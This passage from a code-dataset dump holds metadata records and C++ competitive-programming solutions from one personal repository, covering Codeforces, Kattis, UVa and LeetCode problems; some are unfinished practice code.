"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define fori(i, a, b) for (int i = a; i <= b; i++)\r\n#define ll long long\r\n\r\nmap<ll, int> a;\r\nmap<ll, int> validValue;\r\n//----------------------------------------\r\nvoid process(int firstNum, int secondNum, int cnt) {\r\n ll tempFirstNum = firstNum;\r\n a[tempFirstNum] = 0;\r\n validValue[tempFirstNum] = cnt;\r\n fori(i, 1, 30000) {\r\n if ((tempFirstNum % 2 == 1 && tempFirstNum > (10e18 - 1) / 3) || (tempFirstNum == 1))\r\n break;\r\n if (tempFirstNum % 2 == 0) \r\n tempFirstNum /= 2;\r\n else \r\n tempFirstNum = tempFirstNum * 3 + 1;\r\n if (validValue[tempFirstNum] != cnt) \r\n a[tempFirstNum] = i;\r\n else\r\n break;\r\n validValue[tempFirstNum] = cnt;\r\n }\r\n\r\n ll tempSecondNum = secondNum;\r\n fori(i, 0, 30000) {\r\n if (validValue[tempSecondNum] == cnt) {\r\n cout << firstNum << \" needs \" << a[tempSecondNum] << \" steps, \";\r\n cout << secondNum << \" needs \" << i << \" steps, \";\r\n cout << \"they meet at \" << tempSecondNum;\r\n break;\r\n }\r\n if (tempSecondNum % 2 == 0) \r\n tempSecondNum /= 2;\r\n else \r\n tempSecondNum = tempSecondNum * 3 + 1;\r\n }\r\n cout << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int firstNum, secondNum;\r\n int cnt = 1;\r\n while (cin >> firstNum >> secondNum) {\r\n if (firstNum == 0) break;\r\n process(firstNum, secondNum, cnt++);\r\n }\r\n}"
},
{
"alpha_fraction": 0.290921151638031,
"alphanum_fraction": 0.2995361089706421,
"avg_line_length": 21.81818199157715,
"blob_id": "c5945d76ae08d159367eb83e8ee9180f8ed6578d",
"content_id": "a9ad87b3bf10fba7fd66229a100b05b4ff4a0eb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1509,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 66,
"path": "/codeforces/1506E.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": " #include <bits/stdc++.h>\n using namespace std;\n \n const int NMAX = 2e5 + 3;\n int a[NMAX], n, f[NMAX];\n set<int> se, new_se;\n \n \n void openf() {\n cin >> n;\n for (int i = 1; i <= n; i++)\n cin >> a[i];\n }\n \n void process() {\n for (int i = 1; i <= n; i++)\n f[i] = 0;\n se.clear();\n new_se.clear();\n for (int i = 1; i <= n; i++)\n se.insert(i);\n int cur = 0;\n for (int i = 1; i <= n; i++) {\n if (a[i] > cur) {\n f[i] = a[i];\n cur = a[i];\n se.erase(a[i]);\n }\n }\n for (auto x: se)\n new_se.insert(x);\n \n //find_min\n for (int i = 1; i <= n; i++) {\n if (f[i] == 0) {\n cout << *se.begin();\n se.erase(se.begin());\n }\n else cout << f[i];\n cout << \" \";\n }\n cout << endl;\n \n //find_max\n for (int i = 1; i <= n; i++) {\n if (f[i] == 0) {\n auto it = new_se.lower_bound(a[i]);\n it--;\n cout << *it;\n new_se.erase(it);\n }\n else cout << f[i];\n cout << \" \";\n }\n cout << endl;\n }\n \n int main() {\n //freopen(\"test.inp\", \"r\", stdin);\n int test;\n cin >> test;\n while (test--) {\n openf();\n process();\n }\n }"
},
{
"alpha_fraction": 0.36128661036491394,
"alphanum_fraction": 0.3664560616016388,
"avg_line_length": 29.125,
"blob_id": "219b68d539a30ff553d3a40179b083e9484c2df1",
"content_id": "414efd4a13412c9bfa15d508ace3617ed4c300e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1741,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 56,
"path": "/katis/dream.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nmap<string, int> eventToInt;\r\nstack<string> events; \r\nconst string ERROR = \"Plot Error\";\r\n\r\n//----------------------------------------\r\nint main() {\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n string type, event;\r\n int r, n;\r\n cin >> n;\r\n while (n--) {\r\n cin >> type;\r\n if (type == \"E\") {\r\n cin >> event;\r\n events.push(event);\r\n eventToInt[event] = events.size();\r\n }\r\n else if(type == \"D\") {\r\n cin >> r;\r\n while (r--) {\r\n event = events.top();\r\n eventToInt.erase(event);\r\n events.pop();\r\n }\r\n }\r\n else {\r\n cin >> r;\r\n string res = \"\";\r\n int ma = 0, mi = 1e6;\r\n while (r--) {\r\n cin >> event;\r\n if (res == ERROR) continue;\r\n if (event[0] != '!') {\r\n if (eventToInt.find(event) == eventToInt.end()) //In scenario, but not real\r\n res = ERROR;\r\n else ma = max(ma, eventToInt[event]);\r\n } else {\r\n event = event.substr(1, event.length() - 1);\r\n if (eventToInt.find(event) != eventToInt.end()) //Not in scenario, in real\r\n mi = min(mi, eventToInt[event]);\r\n }\r\n }\r\n\r\n if (res != ERROR)\r\n if (mi == 1e6) res = \"Yes\";\r\n else {\r\n if (mi <= ma) res = \"Plot Error\";\r\n else res = to_string(events.size() - mi + 1) + \" Just A Dream\";\r\n }\r\n cout << res << endl; \r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.3125,
"alphanum_fraction": 0.3253968358039856,
"avg_line_length": 19.489360809326172,
"blob_id": "563d9e6e91ec160eaf5007c846f5b27f9d670143",
"content_id": "732d0a211b5958a6f146c15b7126e86dd673c63f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1008,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 47,
"path": "/katis/supercomputer.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nconst int NMAX = 1e6 + 3;\r\nint n, m, sum[NMAX], a[NMAX], blockSize;\r\n\r\n//----------------------------------------\r\nvoid update(int i) {\r\n sum[i / blockSize] += (a[i] ^ 1) - a[i];\r\n a[i] ^= 1;\r\n}\r\n//----------------------------------------\r\nint getResult(int l, int r) {\r\n int res = 0;\r\n while (l <= r and l % blockSize != 0) {\r\n res += a[l];\r\n l += 1;\r\n }\r\n while (l + blockSize - 1 <= r) {\r\n res += sum[l / blockSize];\r\n l += blockSize;\r\n }\r\n\r\n while (l <= r) {\r\n res += a[l];\r\n l += 1;\r\n }\r\n\r\n return res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n string ch; int u, v;\r\n cin >> n >> m;\r\n blockSize = sqrt(n);\r\n while (m--) {\r\n cin >> ch;\r\n if (ch == \"F\") {\r\n cin >> u;\r\n update(u - 1);\r\n }\r\n else {\r\n cin >> u >> v;\r\n cout << getResult(u - 1, v - 1) << endl;\r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.5152091383934021,
"alphanum_fraction": 0.5209125280380249,
"avg_line_length": 19.91666603088379,
"blob_id": "6113f530607a88e9d1dae67d973885bb790630fd",
"content_id": "8908653b24e044eca9de5f15984630531e4829ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 526,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 24,
"path": "/leetcode/longestSubstring.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nclass Solution {\r\n\tpublic:\r\n\t\tint lengthOfLongestSubstring(string s) {\r\n\t\t\tmap<char, int> m;\r\n\t\t\tint res = 0;\r\n\t\t\tint pPosition = -1;\r\n\t\t\tfor (int i = 0; i < s.length(); i++) {\r\n\t\t\t\tif (m.find(s[i]) != m.end())\r\n\t\t\t\t\tpPosition = max(pPosition, m[s[i]]);\r\n\t\t\t\tm[s[i]] = i;\r\n\t\t\t\t//cout << i << \" \" << pPosition << endl;\r\n\t\t\t\tres = max(res, i - pPosition);\r\n\t\t\t}\t\r\n\t\t\treturn res;\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n\tSolution a = Solution();\r\n\tcout << a.lengthOfLongestSubstring(\" \");\r\n}\r\n"
},
{
"alpha_fraction": 0.37265416979789734,
"alphanum_fraction": 0.39946380257606506,
"avg_line_length": 20.058822631835938,
"blob_id": "c9848e56ec185c83820bd47cf2cd4bd68bcb3d09",
"content_id": "4cf455c8f709a203c0c406b4cdb213c5ad04ee5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 373,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 17,
"path": "/katis/backspace.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nchar a[1000005];\r\n//----------------------------------------\r\nint main() {\r\n char ch;\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int current = -1;\r\n while (cin >> ch) {\r\n if (ch != '<') a[++current] = ch;\r\n else current -= 1;\r\n }\r\n\r\n for (auto i = 0; i <= current; i++)\r\n cout << a[i];\r\n}"
},
{
"alpha_fraction": 0.5319148898124695,
"alphanum_fraction": 0.5460993051528931,
"avg_line_length": 10.75,
"blob_id": "a76395f49f87b85c93e8b76c78ac6bdc5bc69806",
"content_id": "03a3374d5b61c9fb3f8a41d450539e21456abefd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 141,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 12,
"path": "/leetcode/reverse_integer.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n\nint main() {\n\ttry {\n\t\tint a = 4 / 0;\n\t} \n\tcatch (exception& e) {\n\t\tcout << \"Exception\";\n\t}\n}\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 12,
"blob_id": "e857c9409479e9d213aff8c343908ec10ba2339e",
"content_id": "d83af1cb835714577a69a8488add2cf7ecd0b4c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 3,
"path": "/Cargo.toml",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "[package]\nversion = \"2019\"\nname = \"cp\"\n\n"
},
{
"alpha_fraction": 0.5333333611488342,
"alphanum_fraction": 0.5333333611488342,
"avg_line_length": 19.714284896850586,
"blob_id": "8f46f0da79ba9285e870193e9a43b8c361a28780",
"content_id": "fd4ed6d6ef3d82399923eacc65192d82d550f810",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 7,
"path": "/katis/hello.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define fori(i, a, b, c) for (int i=a; i <= b; i += c)\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nint main() {\r\n cout << \"Hello World!\";\r\n}"
},
{
"alpha_fraction": 0.4708404839038849,
"alphanum_fraction": 0.4742709994316101,
"avg_line_length": 28.162500381469727,
"blob_id": "99bcc633257629d19711d5010fb2f492fe587704",
"content_id": "75c834fbd2fb969deb970560959e95231bb020dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2332,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 80,
"path": "/uva/123.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nstruct kwic_title {\n int row_num, pos_num;\n kwic_title(int row_num, int pos_num) {\n this -> row_num = row_num;\n this -> pos_num = pos_num;\n }\n};\nvector<string> titles[203];\nvector<string> ignore_words;\nint num_of_titles = -1;\nvector<kwic_title> list_title;\n\nvoid openf() {\n freopen(\"test.inp\", \"r\", stdin);\n freopen(\"test.out\", \"w\", stdout);\n\n bool isTitle = false;\n string s;\n while (getline(cin, s)) {\n if (s == \"::\") {\n isTitle = true;\n continue;\n }\n if (!isTitle) \n ignore_words.push_back(s);\n else {\n num_of_titles++; \n istringstream iss(s);\n string word;\n int pos_of_word = -1;\n while (iss >> word) {\n transform(word.begin(), word.end(), word.begin(), \n [](char c) { return tolower(c);});\n titles[num_of_titles].push_back(word);\n pos_of_word += 1;\n if (find(ignore_words.begin(), ignore_words.end(), word) == ignore_words.end()) {\n list_title.push_back(kwic_title(num_of_titles, pos_of_word));\n }\n }\n }\n }\n}\n\nvoid process() {\n sort(list_title.begin(), list_title.end(), \n [](kwic_title a, kwic_title b) {\n if (titles[a.row_num][a.pos_num] != titles[b.row_num][b.pos_num])\n return titles[a.row_num][a.pos_num] < titles[b.row_num][b.pos_num];\n return ((a.row_num < b.row_num) || (a.row_num == b.row_num && a.pos_num < b.pos_num));\n });\n\n for (auto title: list_title) {\n int row_num = title.row_num, pos_num = title.pos_num;\n vector<string> vs = titles[row_num];\n for (int i = 0; i < vs.size(); i++) {\n if (i != pos_num)\n cout << vs[i];\n else {\n transform(vs[i].begin(), vs[i].end(), vs[i].begin(),\n [](char ch) { return toupper(ch); });\n cout << vs[i];\n }\n if (i < vs.size() - 1) cout << \" \";\n }\n cout << endl;\n }\n}\n\nint main() {\n openf();\n process();\n}"
},
{
"alpha_fraction": 0.35965630412101746,
"alphanum_fraction": 0.39361703395843506,
"avg_line_length": 27.09195327758789,
"blob_id": "457cacf2da0bb1416fdb4631da5d63a0e6ff10fb",
"content_id": "3dda9cbd2124712aea24c5bc1788b8573e741291",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2444,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 87,
"path": "/leetcode/median_of_two_sorted_array.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\n#include <cmath>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\n\nclass Solution {\n public:\n double findMedianSortedArrays(vector<int>& nums1, vector<int>& nums2) {\n int m = nums1.size(), n = nums2.size();\n \n int t1 = trunc(ceil((m + n) / 2.0)) - 1;\n int t2 = trunc(ceil((m + n + 1) / 2.0)) - 1;\n int u1 = findSpecificPosition(nums1, nums2, t1);\n int v1 = findSpecificPosition(nums1, nums2, t2);\n cout << t1 << \" \" << u1 << endl;\n cout << t2 << \" \" << v1 << endl;\n return (u1 + v1) / 2.0;\n }\n\n private:\n int findSpecificPosition(vector<int>& nums1, vector<int>& nums2, int t) {\n // Force nums1.size() must smaller than nums2.size()\n if (nums1.size() > nums2.size()) \n swap(nums1, nums2);\n\n int i1 = 0, j1 = nums1.size() - 1;\n\n while (i1 <= j1) {\n int mid = (i1 + j1 / 2);\n if (mid > t) {\n j1 = mid;\n continue;\n }\n int ind = (t - mid) - 1;\n if (nums1[mid] <= nums2[ind + 1]) {\n if (ind < 0 || nums1[mid] >= nums2[ind])\n return nums1[mid];\n else {\n i1 = mid + 1;\n continue;\n }\n }\n\n if (nums1[mid] >= nums2[ind + 1]) {\n if (mid <= 0 || nums2[ind + 1] >= nums1[mid - 1])\n return nums2[ind + 1];\n else{\n j1 = mid - 1;\n continue;\n }\n }\n }\n return nums2[t];\n }\n\n};\n\nint main() {\n freopen(\"test.inp\", \"r\", stdin);\n vector<int> nums1;\n vector<int> nums2;\n int m, n, u;\n\n cin >> m >> n;\n rep(i, 0, m, 1) {\n cin >> u;\n nums1.push_back(u);\n }\n rep(i, 0, n, 1) {\n cin >> u;\n nums2.push_back(u);\n }\n \n for (auto x : nums1)\n cout << x << \" \";\n cout << endl;\n for (auto x: nums2) \n cout << x << \" \";\n cout << endl;\n Solution a = Solution();\n cout << a.findMedianSortedArrays(nums1, nums2);\n}\n"
},
{
"alpha_fraction": 0.3974591791629791,
"alphanum_fraction": 0.4110707938671112,
"avg_line_length": 25.90243911743164,
"blob_id": "31215ac795d40e487a14f0c202323e5f3acd99dd",
"content_id": "20b2503c81695b58939268fe065b2b4f3f6d3ea9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1102,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 41,
"path": "/leetcode/search_in_sorted_array.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n\nclass Solution {\npublic:\n int search(vector<int>& nums, int target) {\n int l = 0, r = nums.size() - 1, index = 0;\n while (l <= r) {\n int mid = (l + r) / 2;\n if (mid > 0 && nums[mid] < nums[mid - 1]) {\n index = mid;\n break;\n }\n else if (nums[mid] > nums[r])\n l = mid + 1;\n else \n r = mid - 1;\n }\n cout << \"index \" << index << endl;\n\n if (index > 0 && nums[index - 1] >= target) {\n auto it = lower_bound(nums.begin(), nums.begin() + index, target);\n if (*it == target) \n return (it - nums.begin());\n }\n if (nums[nums.size() - 1] >= target) {\n auto it = lower_bound(nums.begin() + index, nums.end(), target);\n if (*it == target)\n return (it - nums.begin());\n }\n return -1;\n } \n};\n\nint main() {\n Solution a = Solution();\n vector<int> v = {3, 1};\n auto x = a.search(v, 1);\n cout << x;\n}"
},
{
"alpha_fraction": 0.40925925970077515,
"alphanum_fraction": 0.43703705072402954,
"avg_line_length": 23.590909957885742,
"blob_id": "d6d31dd4635e82011f0f38b622f4988d53bbd290",
"content_id": "d0a72595c74eb34790f31b1652e5dd6e2b33a1b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 540,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 22,
"path": "/leetcode/longest_valid_parentheses.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\n public:\n static const int NMAX = 3e4 + 3;\n vector<int> ds[2 * NMAX];\n int t[2 * NMAX];\n int pos[2 * NMAX];\n int longestValidParentheses(string s) {\n memset(pos, 0, sizeof(pos));\n memset(t, 0, sizeof(t));\n for (auto i = 0; i < 2 * NMAX; i++)\n ds[i].clear();\n\n for (int i = 0; i < s.size(); i++) {\n int g = (i == 0 ? NMAX : t[i - 1]);\n t[i] = g + (s[i] == '(' ? 1 : -1);\n }\n \n }\n};"
},
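The longestValidParentheses entry above is stored half-finished: it fills the prefix-balance array t but never computes or returns an answer. Below is a minimal working sketch of the standard stack-of-unmatched-indices approach, offered as one possible completion rather than the prefix-height method the author may have been heading towards:

```
#include <algorithm>
#include <stack>
#include <string>
using namespace std;

// Keep indices of unmatched characters; the distance from the current
// index to the most recent unmatched index is the valid length ending here.
int longestValidParentheses(const string& s) {
    stack<int> unmatched;
    unmatched.push(-1);              // sentinel boundary before the string
    int best = 0;
    for (int i = 0; i < (int)s.size(); i++) {
        if (s[i] == '(') {
            unmatched.push(i);
        } else {
            unmatched.pop();         // try to match this ')'
            if (unmatched.empty())
                unmatched.push(i);   // unmatched ')': new boundary
            else
                best = max(best, i - unmatched.top());
        }
    }
    return best;                     // e.g. ")()())" -> 4
}
```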
{
"alpha_fraction": 0.40076014399528503,
"alphanum_fraction": 0.41342905163764954,
"avg_line_length": 21.235294342041016,
"blob_id": "769a022a3a07dd8769aaa45e9ea03348a1ede2f9",
"content_id": "4daa51cc84a7c3515306135e0783b837a0a5e074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2368,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 102,
"path": "/katis/builddeps.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nconst int NMAX = 1e5 + 3;\r\nint n, res = 0, cnt = 0;\r\nvector<int> ds[NMAX];\r\nmap<string, int> mapFile;\r\nmap<int, string> mapInd;\r\nvector<string> listFile;\r\nqueue<int> q;\r\nvector<int> dependance;\r\nbool inQueue[NMAX];\r\nint deg[NMAX];\r\n//----------------------------------------\r\nint getInd(string fileName) {\r\n if (!mapFile[fileName]) {\r\n mapFile[fileName] = ++cnt;\r\n mapInd[cnt] = fileName;\r\n }\r\n\r\n return mapFile[fileName];\r\n}\r\n//----------------------------------------\r\nvoid openf() {\r\n string s;\r\n cin >> n; \r\n cin.ignore();\r\n rep(depen, 1, n) {\r\n getline(cin, s);\r\n string tmp = \"\";\r\n listFile.clear();\r\n for (auto x: s) {\r\n if (x != ' ') tmp += x;\r\n else {\r\n if (tmp != \"\") listFile.push_back(tmp);\r\n tmp = \"\";\r\n }\r\n }\r\n\r\n if (tmp != \" \") listFile.push_back(tmp);\r\n \r\n listFile[0] = listFile[0].substr(0, listFile[0].length() - 1);\r\n\r\n rep(i, 1, listFile.size() - 1) {\r\n ds[getInd(listFile[i])].push_back(getInd(listFile[0]));\r\n deg[getInd(listFile[0])]++;\r\n }\r\n }\r\n}\r\n//----------------------------------------\r\nvoid DFS(int u) {\r\n if (inQueue[u]) return;\r\n inQueue[u] = 1;\r\n for (auto v: ds[u]) DFS(v);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n string s;\r\n cin >> s;\r\n\r\n DFS(getInd(s));\r\n\r\n rep(i, 1, n) if (deg[i] == 0) \r\n q.push(i);\r\n\r\n while (!q.empty()) {\r\n auto u = q.front();\r\n for (auto v: ds[u]) {\r\n deg[v]--;\r\n if (deg[v] == 0) q.push(v);\r\n }\r\n dependance.push_back(u);\r\n q.pop();\r\n }\r\n\r\n for (auto x: dependance) {\r\n if (inQueue[x]) cout << mapInd[x] << endl;\r\n }\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /*\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.32671675086021423,
"alphanum_fraction": 0.33208155632019043,
"avg_line_length": 21.923076629638672,
"blob_id": "c5b3fe1b099441bc8e4a86251d38f294af840e5e",
"content_id": "a7d81da4168418e431a9c6616f52b14b3c94a93a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1864,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 78,
"path": "/katis/almostunionfind.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int NMAX = 1e5 + 3;\r\nint n, m;\r\nset<int> s[NMAX];\r\nint place[NMAX];\r\nll sum[NMAX];\r\n\r\n//----------------------------------------\r\nvoid unionSet(int u, int v) {\r\n int pu = place[u], pv = place[v];\r\n if (pu == pv) return; \r\n\r\n if (s[pu].size() <= s[pv].size()) swap(pu, pv);\r\n\r\n for (auto x: s[pv]) {\r\n place[x] = pu;\r\n sum[pu] += x;\r\n s[pu].insert(x);\r\n }\r\n\r\n s[pv].clear();\r\n sum[pv] = 0;\r\n\r\n //rep(i, 1, n) \r\n //cout << place[i] << \" \";\r\n //cout << endl;\r\n}\r\n//----------------------------------------\r\nvoid getResult(int u) {\r\n int pu = place[u];\r\n cout << s[pu].size() << \" \" << sum[pu] << endl;\r\n}\r\n//----------------------------------------\r\nvoid unionPointToSet(int u, int v) {\r\n int pu = place[u], pv = place[v];\r\n s[pu].erase(u); s[pv].insert(u);\r\n sum[pu] -= u; sum[pv] += u;\r\n place[u] = pv;\r\n //rep(i, 1, n) \r\n //cout << place[i] << \" \";\r\n //cout << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int t, u, v;\r\n while (cin >> n >> m) {\r\n rep(i, 1, n) {\r\n place[i] = i;\r\n sum[i] = i;\r\n s[i].clear(); \r\n s[i].insert(i);\r\n }\r\n\r\n rep(i, 1, m) {\r\n cin >> t;\r\n //cout << i << endl;\r\n if (t == 1) {\r\n cin >> u >> v;\r\n unionSet(u, v);\r\n }\r\n else if (t == 2) {\r\n cin >> u >> v;\r\n unionPointToSet(u, v);\r\n } \r\n else {\r\n cin >> u;\r\n getResult(u);\r\n }\r\n }\r\n }\r\n}"
},
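The unionSet routine above is an instance of the small-to-large merging trick: always move the elements of the smaller set into the larger one, so any single element migrates at most O(log n) times and n unions cost O(n log n) set insertions overall. A stripped-down sketch of just that idea, with illustrative names rather than the repository's arrays:

```
#include <set>
#include <utility>
using namespace std;

const int NMAX = 1e5 + 3;
set<int> members[NMAX];   // members[s]: elements currently in set s
int owner[NMAX];          // owner[x]: index of the set containing x

void unionSmallToLarge(int u, int v) {
    int su = owner[u], sv = owner[v];
    if (su == sv) return;
    if (members[su].size() < members[sv].size())
        swap(su, sv);                 // merge the smaller set (sv) into the larger (su)
    for (int x : members[sv]) {
        owner[x] = su;                // re-point each moved element
        members[su].insert(x);
    }
    members[sv].clear();
}
```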
{
"alpha_fraction": 0.4866270422935486,
"alphanum_fraction": 0.4985141158103943,
"avg_line_length": 25.510204315185547,
"blob_id": "56a2bbecd0f005a54495a4f25110af23a8a40d64",
"content_id": "7e63a3866cdc7dc87a7fb9af47763f343d78b1ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1346,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 49,
"path": "/katis/secretmessage.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define fori(i, a, b, t) for (int i = a; i <= b; i += t)\r\n#define forr(i, a, b, t) for (int i = a; i >= b; i += t)\r\n\r\nconst int NMAX = 107;\r\n\r\nchar a[NMAX][NMAX];\r\nstring originalMessage;\r\n\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> originalMessage; \r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n // find padded message length\r\n int messageLength = originalMessage.length();\r\n int paddedSqare = round(sqrt(messageLength));\r\n if (paddedSqare * paddedSqare < messageLength)\r\n paddedSqare += 1;\r\n int paddedMessageLength = paddedSqare * paddedSqare;\r\n\r\n // push padded message into table\r\n fori(i, 1, paddedMessageLength - messageLength, 1) \r\n originalMessage += '*';\r\n \r\n int currentPosition = 0;\r\n fori(i, 1, paddedSqare, 1)\r\n fori(j, 1, paddedSqare, 1) \r\n a[i][j] = originalMessage[currentPosition++];\r\n\r\n //write encrypted message\r\n fori(j, 1, paddedSqare, 1)\r\n forr(i, paddedSqare, 1, -1) \r\n if (a[i][j] != '*') cout << a[i][j];\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int testCase;\r\n cin >> testCase;\r\n while (testCase--) {\r\n openf();\r\n process();\r\n if (testCase > 0)\r\n cout << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.368905246257782,
"alphanum_fraction": 0.3744250237941742,
"avg_line_length": 20.64583396911621,
"blob_id": "52c9b4c80a6f9b711f003104ae0e61dd60d612bc",
"content_id": "83f127d9bc93aef0b4fb29cfd9f8b74c7b3d89a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1087,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 48,
"path": "/katis/minimumscalar.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nint n; \r\nvector<int> a, b;\r\n//----------------------------------------\r\nvoid process() {\r\n\r\n}\r\n//----------------------------------------\r\nvoid process(int testCase) {\r\n cout << \"Case #\" + to_string(testCase) + \": \";\r\n ll res = 0;\r\n sort(a.begin(), a.end());\r\n sort(b.begin(), b.end(), greater<int>());\r\n\r\n rep(i, 0, a.size() - 1)\r\n res += (ll)a[i] * b[i];\r\n \r\n cout << res << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n int testCase, u;\r\n cin >> testCase;\r\n rep(i, 1, testCase) {\r\n a.clear();\r\n b.clear();\r\n cin >> n;\r\n rep(j, 1, n) {\r\n cin >> u;\r\n a.push_back(u);\r\n }\r\n rep(j, 1, n) {\r\n cin >> u;\r\n b.push_back(u);\r\n }\r\n process(i);\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.37803590297698975,
"alphanum_fraction": 0.3885955512523651,
"avg_line_length": 23.648649215698242,
"blob_id": "02aa2a92641d4da196be2fb0cbdb4f95ef00c62b",
"content_id": "befa3360b1ae7185213fdbc84e2ae1710f38c593",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 947,
"license_type": "no_license",
"max_line_length": 89,
